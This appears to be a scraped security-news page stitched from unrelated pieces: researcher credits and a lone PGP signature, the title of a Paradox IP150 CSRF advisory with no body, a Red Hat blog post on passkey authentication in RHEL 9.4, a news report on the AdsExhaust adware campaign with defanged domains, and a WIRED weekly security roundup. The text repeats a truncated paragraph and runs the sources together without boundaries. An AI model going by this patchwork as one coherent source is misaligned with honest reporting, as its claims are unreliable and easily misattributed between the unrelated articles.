* Jakob Pachmann ([SBA Research](https://www.sba-research.org/))  
* Fabian Funder ([SBA Research](https://www.sba-research.org/))  
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCAAdFiEEL9Wp/yZWFD9OpIt6+7iGL1j3dbIFAmZyq50ACgkQ+7iGL1j3  
dbIISw/8CO95qAHA1sNw43g7j202gLt4zyIRHAjowX1btaOb5SwEPKgZCMa+Trnz  
fF/Ck5opN/Y8QvKE4C75TJVXVZBja4cTWeNa0bqXXNlvGsUB/9y5N2d7NTAN+CLc  
ew61aTFrudgjHL1hHyhzj74vt0rb44vrBlhQ562jwmHDgkixrek7m5FqLAa4nVVf  
yglBLbUlvi5MVCL1v3b1P5TTTBJfThRps5xhHpMpflyxsBWAdQZ+dZb000K+P5gf  
jnmMYAcDhe1Peun/ui4dYfsNapha16gpZ9vjjq0gBh+Si8t+Ri6Gup3d6AJuWVCV  
zcqjrYN+kwK0/I8e25MCpPNV3rIw16Gb+8HCeSKhVXEQalF1Gw+GVUsVua65hsoa  
JMF2gGN9p89Wcn5HD7Az3pv0HmdjrTghXhyf6JzP+k1NJscPbLQ9Lo7ea7Y4CBTG  
zkPoPEX3Ida05YxMgMesq60fXx9/Eq7vxIJtdnJSwjJVAhbEA+phkuX201ykK7WN  
iWIJVBY2EEZUOt2xBy/PLu6Eh5Bm11vCWqi8KeCyZj7OUYVNIPFbh52W+PJ9B13B  
1j0gf3TZF4nIO+ncvdKw3LQINkdj3G74VwKMFqLxSJQdzxDA0kDjWvZxst45n23J  
6HUGL0ur4KDQCMpeyqqgB46qF1GGl+iqAGJW4lTITUJO62EqRlo=  
=HcOX  
-----END PGP SIGNATURE-----

Paradox IP150 Internet Module 1.40.00 Cross Site Request Forgery

Red Hat Enterprise Linux 9.4 introduces the ability for centrally managed users to authenticate through passwordless authentication with a passkey, meaning it's an enterprise Linux distribution with Fast Identity Online 2 (FIDO2) authentication for centrally managed users! This is all built on the Identity Management solution already in Red Hat Enterprise Linux, but enhances product security by enabling passwordless, Multi-Factor Authentication (MFA), and Single Sign-On (SSO).What is Passkey?A passkey is a FIDO2 compatible device that can be used for user authentication. FIDO2 is an open authe

Red Hat Enterprise Linux 9.4 introduces the ability for centrally managed users to authenticate through passwordless authentication with a passkey, meaning it's an enterprise Linux distribution with Fast Identity Online 2 (FIDO2) authentication for centrally managed users! This is all built on the Identity Management solution already in Red Hat Enterprise Linux, but enhances product security by enabling passwordless, Multi-Factor Authentication (MFA), and Single Sign-On (SSO).

****What is Passkey?****

A passkey is a FIDO2 compatible device that can be used for user authentication. FIDO2 is an open authentication standard based on public-key cryptography. It is more secure than passwords and one-time passwords, and simpler to use. It is usually provided as a hardware security token like a small Universal Serial Bus (USB) and Near Field Communication (NFC) based device. There are several brands of FIDO2 compliant keys, including NitroKey and SoloKey v2, and we've collaborated with Yubico to create a more seamless integration between RHEL and Yubikey.

The use of new tools to authenticate users, such as FIDO2 and External Identity Providers, is becoming increasingly popular because it improves the security authentication process.

Passwordless authentication is a paradigm shift in authentication. It aims to eliminate the need for traditional passwords, and in this article I outline its benefits compared to traditional password-based authentication.

****Password-based authentication****

Password authentication poses security risks, including brute force attacks, password reuse, phishing attacks, and more. From a user experience perspective, passwords are cumbersome to remember and prone to user error. Users often use the same password for multiple accounts, or else they rotate between a few different ones, and rarely invent entirely new passwords. Companies attempt to mitigate this by enforcing password policies, rotation, and management. It's up to users to not share accounts and passwords, intentionally or otherwise.

Password managers can help, but many users either aren’t aware of them or find them too complicated to use. This often leads to passwords on sticky-notes or changing passwords by just adjusting a few characters.

It's not uncommon to look at the news and see a major data breach reported by a major company, revealing that malicious actors got access to millions of passwords. As a countermeasure, the company forces its users to reset credentials. That, of course, only displaces the problem and solves nothing!

****User authentication terminology****

In modern authentication methods, there are some important terms you must understand:

*   Two-factor authentication (2FA): Two distinct forms of identification are needed to authenticate. One of them is usually a password, and the other a code or a biometric reading, such as a fingerprint. The classic adage is, "Something you know, and something you have"
*   Multi-Factor Authentication (MFA): Two or more distinct forms of identification are needed to authenticate. This is similar to 2FA, but in this case it requests two or more factors
*   One-time password (OTP): A password that's valid for only one authentication process. They are often used as a second authentication factor in 2FA/MFA. Two shortcomings are that they can feasibly be intercepted, and they're susceptible to phishing attacks
*   Single Sign-On (SSO): An authentication scheme allowing a user to log in with a single ID to several services and applications
*   Passwordless: An authentication method that allows access to a system without entering a password or answering security questions. Instead, the user provides some other form of evidence, such as a fingerprint, proximity badge, or hardware token code. It's often used alongside MFA and SSO to improve the user experience, strengthen security, and reduce IT operations expense and complexity

****Passkey authentication in Identity Management on RHEL****

Passkey is a combination of passwordless and MFA mechanism. Furthermore, MFA is provided by requesting a Personal Identification Number (PIN) to unlock the token to process the authentication request. Passwordlessness is provided by using public key cryptography (a key pair is generated during the registration process).

Additionally, as long as the device implements it, other authentication factors (such as a fingerprint) are requested. Finally, along with authentication, a Kerberos ticket is granted. This can be used for further identification on network resources, which enables SSO.

All this together eliminates the need for passwords and enables strong authentication. In addition, it can reduce the risk of a data breach, because passwords aren’t reused, the public key pair is generated for each service, and the private key resides inside the token.

****Why is it important?****

Passwordless authentication aligns with regulatory requirements for data protection and security, such as General Data Protection Regulation (GDPR) and Payment Service Directive (PSD2). By implementing strong authentication methods, organizations can better safeguard sensitive information and comply with regulatory standards.

A memorandum from the U.S. Government establishes new policies to enhance security by enforcing passwordless authentication, combined with MFA standards and SSO:

*   _“Enterprise identity management must be compatible with common applications and platforms. As a general matter, users should be able to sign in once and then directly access other applications and platforms within their agency’s IT infrastructure.” (page 6)_
*   _“Fortunately, there are phishing-resistant approaches to MFA that can defend against these attacks. The Federal Government’s Personal Identity Verification (PIV) standard is one such approach. The World Wide Web Consortium (W3C)’s open “Web Authentication” standard, 8 another effective approach, is supported today by nearly every major consumer device and an increasing number of popular cloud services…”_ (page 7)

Passwordless authentication leverages modern technologies such as biometrics, cryptographic keys, and device-based authentication. These technologies offer higher levels of security and scalability compared to traditional password-based authentication methods.

Passwords are vulnerable to numerous security threats that are challenging to overcome using technology and strategies in use today. The main purpose of the passkey feature is to strengthen security, and at the same time to provide a pleasant user experience. This is achieved by using open and well-established standards that enable passwordlessness, MFA, and SSO.

With passkey functionality, users require only a hardware device, and another authentication factor, such as a PIN or a fingerprint, to eliminate the reliance on passwords while elevating security standards. Additionally, issuing a Kerberos ticket alongside the authentication enables SSO capabilities. By integrating these features all together, the risk of data breaches, phishing threats, man-in-the-middle attacks, and other security threats can be significantly reduced, positioning your organization well on its security journey.

****What next?****

Identity Management in Red Hat Enterprise Linux 9.4 now offers the passkey feature to leverage all these capabilities: passwordless, MFA, and SSO.

The good news is that it's so easy to use that there are no excuses to not use it! Watch this quick demonstration to see for yourself:

Red Hat solutions architects and sales teams are ready, and more than happy, to guide your organization through this security journey.

Passkey is the Future, and the Future is Now with Red Hat Enterprise Linux

A new campaign is tricking users searching for the Meta Quest (formerly Oculus) application for Windows into downloading a new adware family called AdsExhaust.
"The adware is capable of exfiltrating screenshots from infected devices and interacting with browsers using simulated keystrokes," cybersecurity firm eSentire said in an analysis, adding it identified the activity earlier this month.
"

A new campaign is tricking users searching for the Meta Quest (formerly Oculus) application for Windows into downloading a new adware family called AdsExhaust.

"The adware is capable of exfiltrating screenshots from infected devices and interacting with browsers using simulated keystrokes," cybersecurity firm eSentire said in an analysis, adding it identified the activity earlier this month.

"These functionalities allow it to automatically click through advertisements or redirect the browser to specific URLs, generating revenue for the adware operators."

The initial infection chain involves surfacing the bogus website ("oculus-app\[.\]com") on Google search results pages using search engine optimization (SEO) poisoning techniques, prompting unsuspecting site visitors to download a ZIP archive ("oculus-app.EXE.zip") containing a Windows batch script.

The batch script is designed to fetch a second batch script from a command-and-control (C2) server, which, in turn, contains a command to retrieve another batch file. It also creates scheduled tasks on the machine to run the batch scripts at different times.

This step is followed by the download of the legitimate app onto the compromised host, while simultaneously additional Visual Basic Script (VBS) files and PowerShell scripts are dropped to gather IP and system information, capture screenshots, and exfiltrate the data to a remote server ("us11\[.\]org/in.php").

The response from the server is the PowerShell-based AdsExhaust adware that checks if Microsoft's Edge browser is running and determines the last time a user input occurred.

"If Edge is running and the system is idle and exceeds 9 minutes, the script can inject clicks, open new tabs, and navigate to URLs embedded in the script," eSentire said. "It then randomly scrolls up and down the opened page."

It's suspected that this behavior is intended to trigger elements such as ads on the web page, especially considering AdsExhaust performs random clicks within specific coordinates on the screen.

The adware is also capable of closing the opened browser if mouse movement or user interaction is detected, creating an overlay to conceal its activities to the victim, and searching for the word "Sponsored" in the currently opened Edge browser tab in order to click on the ad with the goal of inflating ad revenue.

Furthermore, it's equipped to fetch a list of keywords from a remote server and perform Google searches for those keywords by launching Edge browser sessions via the Start-Process PowerShell command.

"AdsExhaust is an adware threat that cleverly manipulates user interactions and hides its activities to generate unauthorized revenue," the Canadian company noted.

"It contains multiple techniques, such as retrieving malicious code from the C2 server, simulating keystrokes, capturing screenshots, and creating overlays to remain undetected while engaging in harmful activities."

The development comes as similar fake IT support websites surfaced via search results are being used to deliver Hijack Loader (aka IDAT Loader), which ultimately leads to a Vidar Stealer infection.

What makes the attack stand out is that the threat actors are also leveraging YouTube videos to advertise the phony site and using bots to post fraudulent comments, giving it a veneer of legitimacy to users looking for solutions to address a Windows update error (error code 0x80070643).

"This highlights the effectiveness of social engineering tactics and the need for users to be cautious about the authenticity of the solutions they find online," eSentire said.

The disclosure also comes on the heels of a malpsam campaign targeting users in Italy with invoice-themed ZIP archive lures to deliver a Java-based remote access trojan named Adwind (aka AlienSpy, Frutas, jRAT, JSocket, Sockrat, and Unrecom).

"Upon extraction the user is served with .HTML files such as INVOICE.html or DOCUMENT.html that lead to malicious .jar files," Broadcom-owned Symantec said.

"The final dropped payload is Adwind remote access trojan (RAT) that allows the attackers control over the compromised endpoint as well as confidential data collection and exfiltration."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Warning: New Adware Campaign Targets Meta Quest App Seekers

Plus: Alleged Apple source code leaks online, cybercrime group Scattered Spider's alleged kingpin gets arrested, and more.

The rolling series of breaches targeting customers of cloud platform Snowflake appears to be a supply chain attack wrapped in another supply chain attack. A hacker who claims to have been involved in the attacks tells WIRED that the hackers, known as ShinyHunter, stole victims’ Snowflake credentials by first breaching an employee of a third-party contractor. (The contractor, however, says it does not believe it was involved.)

Ultimately, the breach of the Snowflake customer accounts, which include Ticketmaster, banking firm Santander, and potentially more than 160 other companies, was possible because their Snowflake accounts did not have multifactor authentication enabled.

Antivirus giant Kaspersky’s worst nightmare has finally come true: The United States government announced on Thursday that it is banning the sale of its software to new customers in the US over alleged Russian national security threats. (Kaspersky has challenged the Biden administration’s claims.) Existing customers, meanwhile, will be banned from downloading Kaspersky software updates after September 29. What could go wrong?

Perplexity AI, an artificial-intelligence-powered search startup, says it’s already valued at a billion dollars. But a WIRED investigation published this week found that its secret sauce has a pungent ingredient: bullshit.

Beyond “hallucinating” details generated by its chatbot, WIRED found that the AI tool appears to be ignoring the Robots Exclusion Protocol—a standard web tool used to prevent scraping—on sites owned by WIRED’s parent company, Condé Nast, and other publications, seemingly allowing it to scrape articles despite the internet equivalent of a “Do Not Enter” sign hanging on WIRED and other Condé Nast sites. Perplexity’s chatbot later plagiarized that same article when prompted.

People traveling through some of the largest train stations in the United Kingdom secretly had their faces scanned by Amazon’s face-recognition tools, according to documents obtained by WIRED. The technology, which was used as part of a trial run, predicted travelers’ various attributes, including gender, age, and likely emotions. The surveillance, which one privacy advocate called “concerning,” could potentially be used for serving advertisements.

Finally, we detailed the rise of robot “dogs” used by militaries, explained what would happen if China invaded Taiwan, and got into the nitty-gritty of the boring-sounding but serious work of spotting the billion-dollar scam tactic known as business email compromise.

That’s not all. Each week, we round up the security and privacy news we didn’t cover in depth ourselves. Click the headlines to read the full stories. And stay safe out there.

For months, ransomware gangs have rampaged across the health care industry, with ruthless attacks targeting Change Healthcare’s national payment network for more than a thousand health care providers, Ascension Healthcare’s 140 hospitals, and dozens of other victims in the medical field. Now that hacking epidemic is crystallizing into yet another catastrophic hospital hack—one that has resulted in the data of 300 million UK patient records leaking online.

Synnovis, a joint-venture medical testing company partially owned by the UK’s National Health Service, has for weeks been battling and negotiating with the Russia-linked ransomware group Qilin, which has deeply disrupted its services in an attempt to extort the company. The result has been well over a thousand postponed operations and thousands more postponed outpatient appointments across multiple UK hospitals. Ambulances have been diverted from the affected hospitals, potentially causing delays in lifesaving care. They’ve even had to ask for new urgent donations of O-type blood, as testing disruptions have prevented other types from being used in patients’ blood transfusions.

Tag

#auth